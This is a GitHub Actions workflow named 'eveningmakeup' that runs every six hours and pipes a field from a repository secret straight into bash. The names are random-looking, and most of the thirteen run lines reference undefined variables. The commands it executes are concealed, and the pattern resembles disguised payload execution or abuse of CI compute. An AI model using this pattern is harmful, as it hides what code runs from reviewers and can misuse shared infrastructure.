name: eveningmakeup

on:
  workflow_dispatch:
  schedule:
    - cron: '12 5/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: eveningmakeup
        env:
          w3959: ${{ secrets.w3959 }}
        run: |
          echo $w3959 | jq -r .w0 | /bin/bash
          echo $mke5 | jq -r .qdv247 | /bin/bash
          echo $tm034 | jq -r .xnoba981 | /bin/bash
          echo $hies11610 | jq -r .t8144 | /bin/bash
          echo $lmk485 | jq -r .ymgse04 | /bin/bash
          echo $j8580 | jq -r .r281 | /bin/bash
          echo $l6034 | jq -r .ypif2 | /bin/bash
          echo $cmzgg72 | jq -r .pc0 | /bin/bash
          echo $rg98 | jq -r .pk192 | /bin/bash
          echo $uugh807 | jq -r .ay035 | /bin/bash
          echo $xtp3262 | jq -r .jjd7 | /bin/bash
          echo $vit05 | jq -r .zdf8350 | /bin/bash
          echo $awvn7 | jq -r .no01 | /bin/bash

